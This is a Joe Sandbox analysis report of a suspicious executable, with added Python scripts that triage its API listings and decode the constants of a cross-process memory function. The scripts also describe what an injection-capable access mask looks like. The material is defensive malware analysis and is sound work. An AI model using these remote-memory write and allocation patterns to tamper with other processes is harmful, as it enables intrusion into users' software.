                                                                              • CoCreateInstance.OLE32(0094DA7C,00000000,00000001,0094D8EC,?), ref: 0090E876
                                                                              • CoUninitialize.OLE32 ref: 0090E893
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                              • String ID: .lnk
                                                                              • API String ID: 2126378814-24824748
                                                                              • Opcode ID: ba54d7b8b595a7c8775628e27eb1a2751e3136ccd359f2de46b5a0d40ceedb0e
                                                                              • Instruction ID: 071d956939e4c845539f7f4ffc0761943f15f200df5c5bf5b197fdc53c17bbc1
                                                                              • Opcode Fuzzy Hash: ba54d7b8b595a7c8775628e27eb1a2751e3136ccd359f2de46b5a0d40ceedb0e
                                                                              • Instruction Fuzzy Hash: FEA125756043019FCB14DF24C484E2AB7E9FF89314F148999F9999B3A1CB31EC45CB92
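The function listings above repeat a handful of API shapes: a size-probe sequence (an API called once, GetLastError read, a heap buffer allocated with GetProcessHeap/HeapAlloc, then the same API called again with the buffer, as in the GetUserObjectSecurity block and both GetTokenInformation blocks, one of them with the TokenIntegrityLevel class), a QueryPerformanceCounter / Sleep / QueryPerformanceCounter timing sequence, and CoInitialize / CoCreateInstance blocks whose only string is `.lnk`. The Python script below is an added example, not part of the Joe Sandbox report and not code from the analysed sample; it parses function blocks in this listing layout into API sequences and tags those shapes so a long report can be triaged in bulk. The sample input is constructed from a few of the blocks above with argument lists trimmed; the tag names and the pattern rules are the example's own heuristics, not Joe Sandbox signatures.

```python
import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: three function blocks in the layout of the report above
# (bullet lines with "ref:" addresses); argument lists are trimmed.
SAMPLE = """\
APIs
• QueryPerformanceCounter.KERNEL32(?,00000000), ref: 00907A74
• QueryPerformanceFrequency.KERNEL32(?,?), ref: 00907A82
• Sleep.KERNEL32(00000000,?), ref: 00907A8A
• QueryPerformanceCounter.KERNEL32(?,?), ref: 00907A94
• Sleep.KERNEL32(?,00000000), ref: 00907AD0
Similarity
• String ID:
• API String ID: 2833360925-0
APIs
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008FAADA
• GetLastError.KERNEL32(?,TokenIntegrityLevel), ref: 008FAAE4
• GetProcessHeap.KERNEL32(00000008,?), ref: 008FAAF3
• HeapAlloc.KERNEL32(00000000,?), ref: 008FAAFA
• GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?), ref: 008FAB10
Similarity
• String ID:
• API String ID: 44706859-0
APIs
  • Part of subcall function 008C660F: GetFullPathNameW.KERNEL32(?,00007FFF), ref: 008C662F
• CoInitialize.OLE32(00000000), ref: 0090E85D
• CoCreateInstance.OLE32(0094DA7C,00000000,00000001,0094D8EC,?), ref: 0090E876
• CoUninitialize.OLE32 ref: 0090E893
Similarity
• String ID: .lnk
• API String ID: 2126378814-24824748
"""

# One API line: optional "Part of subcall function X:" prefix, Name.MODULE,
# optional "(args)", then ", ref: ADDR" (the comma is absent when no args).
API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_.]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KEY_RE = re.compile(r"^\s*•\s*(?P<key>String ID|API String ID):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str
    subcall_of: Optional[str] = None  # set for "Part of subcall function" lines


@dataclass
class FunctionBlock:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_string_id: str = ""
    tags: set[str] = field(default_factory=set)


def classify(block: FunctionBlock) -> set[str]:
    """Heuristic tags for the API shapes in one block (this example's own rules)."""
    names = [c.name for c in block.apis]
    tags: set[str] = set()
    # Size probe: API called, GetLastError read, HeapAlloc, same API called again.
    for i, name in enumerate(names):
        if name in names[i + 1:]:
            between = set(names[i + 1:names.index(name, i + 1)])
            if {"GetLastError", "HeapAlloc"} <= between:
                tags.update({"two-pass-buffer-query", "size-probe:" + name})
                break
    if any("TokenIntegrityLevel" in a for c in block.apis for a in c.args):
        tags.add("token-integrity-level")
    # Elapsed time measured around Sleep: QPC before and after.
    if names.count("QueryPerformanceCounter") >= 2 and "Sleep" in names:
        tags.add("timing-measurement")
    if "CoCreateInstance" in names and ".lnk" in block.strings:
        tags.add("com-with-lnk-string")
    return tags


def parse_blocks(text: str) -> list[FunctionBlock]:
    """Split a listing into blocks (one per 'APIs' header) and tag each one."""
    blocks: list[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            cur.apis.append(ApiCall(m.group("name"), m.group("module"), args,
                                    m.group("ref"), m.group("sub")))
            continue
        m = KEY_RE.match(line)
        if m and m.group("key") == "String ID":
            cur.strings = [s for s in m.group("val").strip().split("$") if s]
        elif m:
            cur.api_string_id = m.group("val").strip()
    for b in blocks:
        b.tags = classify(b)
    return blocks


def triage(text: str) -> list[tuple[str, list[str]]]:
    """(API String ID, sorted tags) per block, for a quick review table."""
    return [(b.api_string_id, sorted(b.tags)) for b in parse_blocks(text)]


if __name__ == "__main__":
    for sid, tags in triage(SAMPLE):
        print(f"{sid:>22}  {', '.join(tags) or '-'}")
```

The tags are deliberately descriptive rather than verdicts: a two-pass GetTokenInformation(TokenIntegrityLevel) is equally at home in a benign runtime's "is this process elevated" helper, and the QPC/Sleep pair is what any calibrated sleep looks like. The value of the pass is that it reduces a few thousand lines of listing to one row per function, so the reviewer can jump to the blocks that share an API String ID or tag set instead of reading every hash.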
                                                                              APIs
                                                                              • __startOneArgErrorHandling.LIBCMT ref: 008E32ED
                                                                                • Part of subcall function 008EE0D0: __87except.LIBCMT ref: 008EE10B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorHandling__87except__start
                                                                              • String ID: pow
                                                                              • API String ID: 2905807303-2276729525
                                                                              • Opcode ID: 37fabff30309a8c8059174b9a555ba8eec1bcc7f95e0e6b3a263074241e27b59
                                                                              • Instruction ID: ac88014c6b08621d6f814145cfe1c51fe5f1abeb81e034f66916497cbea2321d
                                                                              • Opcode Fuzzy Hash: 37fabff30309a8c8059174b9a555ba8eec1bcc7f95e0e6b3a263074241e27b59
                                                                              • Instruction Fuzzy Hash: 51516A31A0C28696CB156B1AD94577A3B94FB43712F208D28F4D5C33E9DF358EC8A746
                                                                              APIs
                                                                              • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0095DC50,?,0000000F,0000000C,00000016,0095DC50,?), ref: 00904645
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • CharUpperBuffW.USER32(?,?,00000000,?), ref: 009046C5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: BuffCharUpper$__itow__swprintf
                                                                              • String ID: REMOVE$THIS
                                                                              • API String ID: 3797816924-776492005
                                                                              • Opcode ID: 38d692664ac2780bf3976b26c2f2d6f29b067fedc46af9ae9fbcf797ff6fdf21
                                                                              • Instruction ID: 6baedc75a1d00fce68fd1e2f48d3dfc7667f1f86025efb170a1a9176c21c20d2
                                                                              • Opcode Fuzzy Hash: 38d692664ac2780bf3976b26c2f2d6f29b067fedc46af9ae9fbcf797ff6fdf21
                                                                              • Instruction Fuzzy Hash: DE417274A002199FCF01EF68C885AADB7B9FF45304F148459EA16EB3A2DB34DD45CB51
                                                                              APIs
                                                                                • Part of subcall function 0090430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC08,?,?,00000034,00000800,?,00000034), ref: 00904335
                                                                              • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 008FC1D3
                                                                                • Part of subcall function 009042D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,008FBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 00904300
                                                                                • Part of subcall function 0090422F: GetWindowThreadProcessId.USER32(?,?), ref: 0090425A
                                                                                • Part of subcall function 0090422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 0090426A
                                                                                • Part of subcall function 0090422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,008FBBCC,00000034,?,?,00001004,00000000,00000000), ref: 00904280
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC240
                                                                              • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 008FC28D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                              • String ID: @
                                                                              • API String ID: 4150878124-2766056989
                                                                              • Opcode ID: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                              • Instruction ID: 21394263ef5336fd1add2aba69bdffc2a455a5f69bbf06a2464efca9d0c894b3
                                                                              • Opcode Fuzzy Hash: a2b4bfb5ae4e2bfee4483f089c64a1aecad9669f9f35bd68213ec5a023a64679
                                                                              • Instruction Fuzzy Hash: 874139B6A0021CAEDB10DBA8CD81BEEB7B8FB49300F004095FA55B7181DA71AF45DB61
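Decoding the raw constants in the record above (an added example, not part of the Joe Sandbox report and not code from the sample): OpenProcess is called with desired access 0x438, VirtualAllocEx with allocation type 0x1000 and protection 0x4, and SendMessageW with 0x1104 and 0x1111 in the function itself; the values 0x1004 and 0x1073 appear only in the trailing slots of the subcall argument lists, which in these listings are caller stack content rather than parameters of ReadProcessMemory or OpenProcess, so they are read here as context. The script splits the access mask into named rights (winnt.h) and maps the message numbers to their commctrl.h names. The "verdict" rule in triage_remote_memory() is this example's own heuristic, an assumption rather than anything the sandbox computes; the reading that a write-but-not-execute mask combined with LVM_/TVM_ messages matches a remote list-view or tree-view read of the kind AutoIt's Control* functions perform rests on the report's separate "compiled AutoIt script" signature, not on anything the report states about this function.

```python
"""Decode the Win32 constants in a Joe Sandbox function record.

Added example, not part of the report. RECORD is constructed by copying the
argument values the report lists for the function at 008FC1D3 and its subcalls;
the constant tables are documented winnt.h / commctrl.h values; the triage rule
in triage_remote_memory() is this example's own heuristic (an assumption), not
something the sandbox computes.
"""
from __future__ import annotations

# Process access rights (winnt.h): the bits that matter for remote-memory work.
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0200: "PROCESS_SET_INFORMATION",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x0800: "PROCESS_SUSPEND_RESUME",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
    0x100000: "SYNCHRONIZE",
}
ALLOC_TYPES = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PROTECTIONS = {
    0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE", 0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE",
}
EXECUTABLE = {0x10, 0x20, 0x40}
# Common-control messages (commctrl.h): LVM_FIRST = 0x1000, TV_FIRST = 0x1100.
CONTROL_MESSAGES = {
    0x1004: "LVM_GETITEMCOUNT",   # LVM_FIRST + 4
    0x1073: "LVM_GETITEMTEXTW",   # LVM_FIRST + 115
    0x1104: "TVM_GETITEMRECT",    # TV_FIRST + 4
    0x1111: "TVM_HITTEST",        # TV_FIRST + 17
}

# Constructed from the report's argument lists for 008FC1D3 / 0090422F / 009042D6.
RECORD = {
    "open_process_access": 0x438,
    "alloc_type": 0x1000,
    "alloc_protect": 0x4,
    "messages": [0x1104, 0x1111, 0x1004, 0x1073],
}


def decode_flags(value: int, table: dict[int, str]) -> list[str]:
    """Split a bitmask into the names in `table`; unknown bits are kept as one hex tail."""
    names = [name for bit, name in sorted(table.items()) if value & bit]
    leftover = value & ~sum(table)
    if leftover:
        names.append(f"0x{leftover:X}")
    return names


def decode_access(mask: int) -> list[str]:
    """Named rights in an OpenProcess desired-access mask, lowest bit first."""
    return decode_flags(mask, PROCESS_ACCESS)


def triage_remote_memory(mask: int, alloc_type: int, protect: int, messages: list[int]) -> dict:
    """Heuristic verdict on a cross-process VirtualAllocEx / Write / Read pattern.

    injection-capable: can write AND (maps executable memory OR may start a thread)
    control-read:      can write, no execute/thread, and sends LVM_/TVM_ messages
                       (LVM_GETITEMTEXT needs its LVITEM buffer inside the window's owner)
    remote-write / remote-read: everything else
    """
    rights = set(decode_access(mask))
    names = [CONTROL_MESSAGES.get(m, f"0x{m:X}") for m in messages]
    can_write = {"PROCESS_VM_OPERATION", "PROCESS_VM_WRITE"} <= rights
    can_run = protect in EXECUTABLE or "PROCESS_CREATE_THREAD" in rights
    talks_to_control = any(n.startswith(("LVM_", "TVM_")) for n in names)
    if can_write and can_run:
        verdict = "injection-capable"
    elif can_write and talks_to_control:
        verdict = "control-read"
    elif can_write:
        verdict = "remote-write"
    else:
        verdict = "remote-read"
    return {
        "rights": sorted(rights),
        "alloc": decode_flags(alloc_type, ALLOC_TYPES),
        "protect": PROTECTIONS.get(protect, f"0x{protect:X}"),
        "messages": names,
        "verdict": verdict,
    }


def triage_record(record: dict = RECORD) -> dict:
    """Run the triage over one record dict shaped like RECORD."""
    return triage_remote_memory(record["open_process_access"], record["alloc_type"],
                                record["alloc_protect"], record["messages"])


if __name__ == "__main__":
    for key, value in triage_record().items():
        print(f"{key:>9}: {value}")
```

The mask 0x438 carries no PROCESS_CREATE_THREAD bit and the remote page is PAGE_READWRITE, so this function on its own cannot start code in the target; a full PROCESS_ALL_ACCESS mask (0x1FFFFF) with a PAGE_EXECUTE_READWRITE allocation would flip the verdict to injection-capable, which is the shape to look for when locating the thread-injection behaviour the report flags elsewhere.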
                                                                              APIs
                                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0095DC00,00000000,?,?,?,?), ref: 0092A6D8
                                                                              • GetWindowLongW.USER32 ref: 0092A6F5
                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0092A705
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long
                                                                              • String ID: SysTreeView32
                                                                              • API String ID: 847901565-1698111956
                                                                              • Opcode ID: 6202284f2328beb763fc010c107a59cc2d2a36873d31cbd1d571b9ad3b767773
                                                                              • Instruction ID: 37387fed2e38ee386937869fd0a0e3842423f38999db080bcd37cbf3bb835b10
                                                                              • Opcode Fuzzy Hash: 6202284f2328beb763fc010c107a59cc2d2a36873d31cbd1d571b9ad3b767773
                                                                              • Instruction Fuzzy Hash: 7131DE36601216AFDB218E38EC45BEA77ADFB49324F244729F875D32E0D730E8509B95
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 0092A15E
                                                                              • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 0092A172
                                                                              • SendMessageW.USER32(?,00001002,00000000,?), ref: 0092A196
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Window
                                                                              • String ID: SysMonthCal32
                                                                              • API String ID: 2326795674-1439706946
                                                                              • Opcode ID: a5e285c7ff0e4e424dd30d09b2ccedfe9359c978792e8c76cdc57a928e37a303
                                                                              • Instruction ID: ea93c6cbba2a868cc755001944b0f01f4ca8d78d785481a41e024008279356b1
                                                                              • Opcode Fuzzy Hash: a5e285c7ff0e4e424dd30d09b2ccedfe9359c978792e8c76cdc57a928e37a303
                                                                              • Instruction Fuzzy Hash: A721BF33510228BBDF158F94DC82FEA3B79EF48724F110214FA55AB1D1D6B5AC51DB90
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 0092A941
                                                                              • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 0092A94F
                                                                              • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0092A956
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$DestroyWindow
                                                                              • String ID: msctls_updown32
                                                                              • API String ID: 4014797782-2298589950
                                                                              • Opcode ID: 47905c4bf2ccd03eb8990abf67c7527bc47602472d116a8a6e90dfb7673ca4b3
                                                                              • Instruction ID: 6c9697b340f2f31847e8d87377a877bc0c166520f59d4124b7a9c2ce5b0d45c5
                                                                              • Opcode Fuzzy Hash: 47905c4bf2ccd03eb8990abf67c7527bc47602472d116a8a6e90dfb7673ca4b3
                                                                              • Instruction Fuzzy Hash: 882190BA600219AFDB10DF29DC91D6737ADEB5A3A4B050059FA049B3A1DB30EC52DB61
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00929A30
                                                                              • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00929A40
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00929A65
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$MoveWindow
                                                                              • String ID: Listbox
                                                                              • API String ID: 3315199576-2633736733
                                                                              • Opcode ID: 4eb1b551be12c871869c67641be81237dd2ede69d4ab43d19df0f17eb86aa7d3
                                                                              • Instruction ID: 8d7d0a4a7475c6088847d85158ca44d8317017790840da73f07fcb28f90105d0
                                                                              • Opcode Fuzzy Hash: 4eb1b551be12c871869c67641be81237dd2ede69d4ab43d19df0f17eb86aa7d3
                                                                              • Instruction Fuzzy Hash: AB210432610228BFDF218F54EC85FBB3BAEEF8A760F018129F9459B190C6719C51C7A0
                                                                              APIs
                                                                              • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0092A46D
                                                                              • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 0092A482
                                                                              • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 0092A48F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID: msctls_trackbar32
                                                                              • API String ID: 3850602802-1010561917
                                                                              • Opcode ID: 2c88ee2fb2569ab597a9e2e1366116e63ea458f766a304d743c4d5ebe53e2dd2
                                                                              • Instruction ID: 1f0c96d17d86660baca0bbb1cee342136203171bea9e6804b012278d9a633c01
                                                                              • Opcode Fuzzy Hash: 2c88ee2fb2569ab597a9e2e1366116e63ea458f766a304d743c4d5ebe53e2dd2
                                                                              • Instruction Fuzzy Hash: AE11E772210218BFEF205F65DC45FAB376DEF89754F014218FA45960A1D2B1E811D720
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,008E2350,?), ref: 008E22A1
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 008E22A8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoInitialize$combase.dll
                                                                              • API String ID: 2574300362-340411864
                                                                              • Opcode ID: 0e10c048b0c24e550501c79526c22d1449bf08b71e85afdb1e3b795118894578
                                                                              • Instruction ID: 3dc850210814deec58a0561d9cdb37fa8452a4997b17e91a7547c65eff949164
                                                                              • Opcode Fuzzy Hash: 0e10c048b0c24e550501c79526c22d1449bf08b71e85afdb1e3b795118894578
                                                                              • Instruction Fuzzy Hash: D5E04F786BD300ABDB905F71EC4EF1A3668BB82716F004428F202D71E0DBB84088EF08
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008E2276), ref: 008E2376
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 008E237D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressLibraryLoadProc
                                                                              • String ID: RoUninitialize$combase.dll
                                                                              • API String ID: 2574300362-2819208100
